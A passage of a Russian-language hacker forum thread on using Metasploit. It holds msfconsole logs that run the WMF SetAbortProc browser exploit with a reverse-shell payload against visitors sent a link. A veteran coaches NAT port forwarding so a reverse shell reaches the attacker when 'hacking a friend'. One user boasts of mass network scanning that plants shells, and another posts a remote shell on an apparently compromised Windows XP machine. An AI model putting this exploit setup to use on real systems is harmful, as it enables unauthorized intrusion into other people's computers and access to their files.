Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    В третьей версии ms06_001_wmf_setabortproc
    А вообще в папке ..\modules\exploits\windows\browser\ ищи сплоиты под IE (в основном они все там).
     
    #141 -=lebed=-, 29 May 2008
    Last edited: 29 May 2008
  2. qweasd

    qweasd New Member

    Joined:
    14 Aug 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Спасибо большое выручил!!!))
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Куда команда ls делась ? В 2.7 была,хоть и не документирована
     
  4. EJI

    EJI New Member

    Joined:
    29 Jul 2008
    Messages:
    6
    Likes Received:
    4
    Reputations:
    0
    Обновление вам в помошь!
     
  5. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
    Посчитал что комунибудь книга пригодится :).
    Вот книга по применению MSF все примеры в книге второй верси метасплоита в книге уделено лиш 2 последнии главы .
    В книге рассматривается интерфейсы mfsweb,mfsconsole,msfcli для управление ядром MSF .


    Разработка средств безопасности и эксплойтов
    Формат-DjVu
    Вес-16862 KB
    http://rapidshare.de/files/40213549/__1055___1080___1090___1077___1088__-___1056___1072___1079___1088___1072___1073___1086___1090___1082.html
     
    #145 Mo4x, 11 Aug 2008
    Last edited: 11 Aug 2008
  6. D1mka

    D1mka Elder - Старейшина

    Joined:
    2 Jan 2008
    Messages:
    123
    Likes Received:
    14
    Reputations:
    2
    а то что, антивирусы ругаются на троя, когда скачиваешь пакет, эт нормально?
     
  7. ONEx

    ONEx Banned

    Joined:
    3 Feb 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    ?

    [*] Starting Reverse Handler.

    [*] Waiting for connections to http://93.80.176.249:8080/

    [*] HTTP Client connected from 93.80.176.249:1331, redirecting...

    [*] HTTP Client connected from 93.80.176.249:1333, sending 1804 bytes of payload...

    а дальше тишина и консоль висит... не подскажите в чем причина? /*пробую сам на себе, делаю как написано)*/
     
    #147 ONEx, 25 Aug 2008
    Last edited: 25 Aug 2008
  8. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Полностью лог выложи... сплоит WMF юзаешь? если ты юзаешь сам на себе, локально, то почему у тебя IP внешний? Прописывай локальный IP.... через нат по внешнему IP ты сам до себя не достучишься...
     
  9. ONEx

    ONEx Banned

    Joined:
    3 Feb 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    msf > ls
    framework framework.tar msfupdate run_msfconsole run_msfupdate run_msfweb userguide.pdf
    msf > cd framework
    msfconsole: chdir: changed to directory framework
    msf > ls
    data exploits msfcli msfelfscan msfpayload msfweb sdk tools
    docs extras msfconsole msfencode msfpescan nops src
    encoders lib msfdldebug msflogdump msfupdate payloads t
    msf > ls exploits
    ..........список эксплойтов..............
    msf ie_xp_pfv_metafile > info ie_xp_pfv_metafile

    Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
    Class: remote
    Version: $Rev: 3818 $
    Target OS: win32, winxp, win2003
    Keywords: wmf
    Privileged: No
    Disclosure: Dec 27 2005

    Provided By:
    H D Moore <hdm [at] metasploit.com
    san <san [at] xfocus.org>
    O600KO78RUS[at]unknown.ru

    Available Targets:
    Automatic - Windows XP / Windows 2003 / Windows Vista

    Available Options:

    Exploit: Name Default Description
    -------- -------- ------- -------------------------------------------
    optional REALHOST External address to use for redirects (NAT)
    optional HTTPHOST 0.0.0.0 The local HTTP listener host
    required HTTPPORT 8080 The local HTTP listener port

    Payload Information:
    Space: 1904
    Avoid: 1 characters
    | Keys: noconn tunnel reverse

    Nop Information:
    SaveRegs: esp ebp
    | Keys:

    Encoder Information:
    | Keys:

    Description:
    This module exploits a vulnerability in the GDI library included
    with Windows XP, 2003, and Vista. This vulnerability uses the
    'Escape' metafile function to execute arbitrary code through the
    SetAbortProc procedure. This module generates a random WMF record
    stream for each request and is will gzip encode the WMF payload if
    the browser supports it.

    References:
    http://www.securityfocus.com/bid/16074
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-4560
    http://www.osvdb.org/21987
    http://www.milw0rm.com/metasploit/111
    http://wvware.sourceforge.net/caolan/ora-wmf.html
    http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt

    msf ie_xp_pfv_metafile > set LHOST 93.80.193.97
    LHOST -> 93.80.193.97
    msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf ie_xp_pfv_metafile(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://93.80.193.97:8080/
    даю другу ссылку
    [*] HTTP Client connected from 88.147.194.69:1313, redirecting...
    [*] HTTP Client connected from 88.147.194.69:1315, sending 1904 bytes of payload...

    юзаю 2,7 версию 93.80.193.97 - мой внешний IP
    2й раз пробовал прописать этот айпи и в LHOST и в HTTPHOST. Таже ситтуация. если прописывать только HTTPHOST и не писать LHOST(которого и в info то нету) то пишет после запуска - Error: Missing required option: LHOST
     
    #149 ONEx, 25 Aug 2008
    Last edited: 25 Aug 2008
  10. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Зачем ты в LHOST пишешь свой внешний IP если ты ломаешь сам себя?
    LHOST - параметр начинки, в твоём случае это реверсшелл. Ключевое слово - реверс. Поэтому он должен знать куда коннектится. Если это твой комп то смело пиши локальный IP, на худой конец пробуй 127.0.0.1. Http-сервер метасплоита также у тебя поднимается на локальном IP. Ну не сможешь ты сам к себе обратится по внешнику через NAT! вот если бы ты разместил сплоит где-нибудь в инете, тогда да - надо в LHOST указывать внешний свой IP, чтоб реверс-шелл мог приконнектится со взломанной тачки...
     
  11. ONEx

    ONEx Banned

    Joined:
    3 Feb 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    ок, спасибо
    А если я пытаюсь так сделать с другом то мне в Lhost-е писать свой внешний? И надо ли вообще трогать Httphost? (Сори если вопросы покажутся тупыми, только начал разбираться с эксплойтами..)
    или HTTPHOST это то, где я размещаю сплойт, а LHOST - то куда идет он если кто то попался?
     
    #151 ONEx, 25 Aug 2008
    Last edited: 25 Aug 2008
  12. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Если в Инете хочешь взломать друга, то вопервых через нат надо пробросить порты (все) т.е. выставить редирект по всем портам с внешнего ИП на внутренний (локальный). В LHOST - параметр начинки конечно указать свой внешний IP. Сервер метасплоита поднимаешь у себя - на нём будет висеть страница с WMF-сплоитом, начинённым реверсшеллом.
    Т.е. что происходит. Ты запускуаешь сплоит на своём локальном ИП. Даёшь ссыль другу со своим уже внешним ИП. Друг заходит по ссылке и попадает на Вебсервер, на котором висит этот сплоит. Далее происходит загрузка картинки в кэш браузера и запуск программы просмотра факсов, вот тут и Dll теряет управление и передаёт его на исполняемый код реверсшелла. Он начинает пытаться соединится с твоим компом по произвольным портам в районе 1000-2000. Если у него не получается - то он пробует использовать другой порт... поэтому и пишет постоянный редирект....
     
  13. ONEx

    ONEx Banned

    Joined:
    3 Feb 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Огромное спасибо, буду пробовать :)
    Снова вопрос)Сори уже наверно достал, но хочется разобраться..
    msf > use ie_xp_pfv_metafile
    msf ie_xp_pfv_metafile > set LHOST 93.80.193.97
    LHOST -> 93.80.193.97
    msf ie_xp_pfv_metafile > set REALHOST 10.172.25.1**
    REALHOST -> 10.172.25.1**
    msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf ie_xp_pfv_metafile(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://93.80.193.97:8080/
    Дальше закидываю ссылки.. дальше 2 варианта.
    1)[*] HTTP Client connected from 84.54.67.122:1959, redirecting...
    [*] HTTP Client connected from 84.54.67.122:1987, redirecting...
    [*] HTTP Client connected from 84.54.67.122:1995, redirecting...
    ....
    однако sending 1308 bytes of payload... - не было
    и 2) [*] HTTP Client connected from 213.234.238.113:2268, sending 1308 bytes of paylo
    ad...
    [*] HTTP Client connected from 213.234.238.113:2272, redirecting...
    и всё..
    Сколько примерно должен идти редиректинг то?

    зы мой внешний IP сейчас 93.80.193.97(IP клиента)
    Локальный - 10.172.25.1** (тип адреса - присвоен DHCP) (у меня VPN) (всё там смотрю то?:))
    Порт не меняю. На стандартный он не ругается. Я хотябы правильно всё расставил? LHOST 93.80.193.97 (на него и даю ссылку); REALHOST - 10.172.25.1**.
    Не подскажешь какой параметр за это отвечает?
    Спасибо за внимание
     
    #153 ONEx, 25 Aug 2008
    Last edited: 26 Aug 2008
    1 person likes this.
  14. Demrak

    Demrak New Member

    Joined:
    24 Dec 2007
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    Почему нельзя учить новичков

    Когда только начинал заниматься всякой хренотенью, часто задавался вопросом почему более продвинутые интернет-товарищи не делятся инфой. Прошло несколько лет. Уже раз 5 хотел написать статьи о том чего нет на паблике, но то что я лично использую уже года 2. Но каждый раз останавливался. Думаю продвинутые интернет-товарищи поймут почему. Так о чем это я. В течении нескольких месяцев я писал один скажем так скриптик (естественно Metasploit 3), теперь для сканирования сетки с подбором эксплоитов (своих для каждой системы) я нажимаю буквально десяток кнопочек, флажков и т.д. и через пару часов имею списки всех компов с установленными шеллами и открытые консольки тех кто онлайн.
    Вообщем Metasploit - очень мощный инструмент и если вы сможете его самостоятельно освоить и использовать в своих повседневных целях, то со временем вам может быть доступно все. Удачи.

    П.С. скрипт не дам никому, а тем кому мог бы дать, сами напишут и получше.
     
  15. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Поэтому и есть на ачате закрытые разделы, по поводу инструмента, согласен... ;) только вот у меня руки пока не доходят до него, чтоб скрипты писать на Руби для MSF. А в целом удобная штука...
     
  16. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Обычно это настраивается в роутере (ADSL-модем) Если ты подключен через VPN к интернету, то даже не знаю, вряд ли получится, хотя х.е.з. надо пробовать... Редирект идёт постоянно, раз не может реверсшелл приконнектится...
     
  17. Sergey_Gusev

    Sergey_Gusev Guest

    Reputations:
    0
    Кодировка в консоли Metasploit Framework 3.1?

    Добрый день.
    Так получилось что жизнь заставила обратится к MSF 3.1 а точнее использовать ms04_007_killbill + reverse_tcp, Запускалось все под Вистой.
    Все начиналось хорошо - получил командную строку на целевой машине, одно но - она под XP RUS, соответственно все нужные мне папки русскоязычные, отображаются кракозяблами. В GUI пытался менять кодировку на удаленной машине chcp. В WEB интерфейсе менял в браузере кодировку отображаемой страницы. Результат один - те-же яйца только в профиль (в смысле кракозяблы только разные).
    Соответственно вопрос - что делать и как быть.
    Всем спасибо.
     
  18. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    А в шелле пробовал менять?
    Я рекомендую в этом случае поставить бесплатную Virtual PC 2007 от мелкомягких и гостевую Win-XP и уже в гостевуху установить пакет MSF 3.1.
    Есть подозрение что это из-за того что, cmd-shell в Висте и XP разные...
    P.S. Хорошо было бы, если тут ты привёл лог с "кракозяблы" чтоб определить Штирлицом в какой кодировке идёт вывод...
     
    1 person likes this.
  19. Sergey_Gusev

    Sergey_Gusev Guest

    Reputations:
    0
    Microsoft Windows XP [‚¥àá¨ï 5.1.2600]

    (‘) Š®à¯®à*æ¨ï Œ*©ªà®á®äâ, 1985-2001.



    C:\WINDOWS\system32>cd c:\
    cd c:\


    C:\>dir
    dir
    ’®¬ ¢ ãáâனá⢥ C *¥ ¨¬¥¥â ¬¥âª¨.

    ‘¥à¨©*ë© *®¬¥à ⮬*: BC42-7B8D



    ‘®¤¥à¦¨¬®¥ ¯*¯ª¨ C:\



    08.09.2008 19:35 <DIR> ATI

    07.09.2008 21:36 0 AUTOEXEC.BAT

    07.09.2008 21:36 0 CONFIG.SYS

    07.09.2008 21:42 <DIR> Documents and Settings

    21.09.2008 13:50 <DIR> lj1010 series

    01.10.2008 19:09 <DIR> Program Files

    08.09.2008 21:31 19ÿ490 routes.vbs

    04.10.2008 17:50 <DIR> WINDOWS

    08.09.2008 22:17 <DIR> WUTemp

    3 ä*©«®¢ 19ÿ490 ¡*©â

    6 ¯*¯®ª 17ÿ067ÿ040ÿ768 ¡*©â ᢮¡®¤*®



    C:\>

    C:\>cd "Documents and Settings"
    cd "Documents and Settings"


    C:\Documents and Settings>dir
    dir
    ’®¬ ¢ ãáâனá⢥ C *¥ ¨¬¥¥â ¬¥âª¨.

    ‘¥à¨©*ë© *®¬¥à ⮬*: BC42-7B8D



    ‘®¤¥à¦¨¬®¥ ¯*¯ª¨ C:\Documents and Settings



    07.09.2008 21:42 <DIR> .

    07.09.2008 21:42 <DIR> ..

    07.09.2008 21:34 <DIR> All Users

    07.09.2008 21:43 <DIR> €¤¬¨*¨áâà*â®à

    09.09.2008 18:24 <DIR> Šà¨áâ¨**

    0 ä*©«®¢ 0 ¡*©â

    5 ¯*¯®ª 17ÿ066ÿ319ÿ872 ¡*©â ᢮¡®¤*®



    C:\Documents and Settings>chcp
    chcp
    ’¥ªãé*ï ª®¤®¢*ï áâà**¨æ*: 866



    C:\Documents and Settings>chcp 1251
    chcp 1251
    ’¥ªãé*ï ª®¤®¢*ï áâà**¨æ*: 1251



    C:\Documents and Settings>dir
    dir
    Òîì â óñòðîéñòâå C íå èìååò ìåòêè.

    Ñåðèéíûé íîìåð òîìà: BC42-7B8D



    Ñîäåðæèìîå ïàïêè C:\Documents and Settings



    07.09.2008 21:42 <DIR> .

    07.09.2008 21:42 <DIR> ..

    07.09.2008 21:34 <DIR> All Users

    07.09.2008 21:43 <DIR> Àäìèíèñòðàòîð

    09.09.2008 18:24 <DIR> Êðèñòèíà

    0 ôàéëîâ 0 áàéò

    5 ïàïîê 17*065*467*904 áàéò ñâîáîäíî



    C:\Documents and Settings>
     
  20. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Штирлиц показывает Win->Dos(3) 3 раза?
    тут всё ок - преобразований не проводилось. (наверно просто шрифт нужен с кириллицой).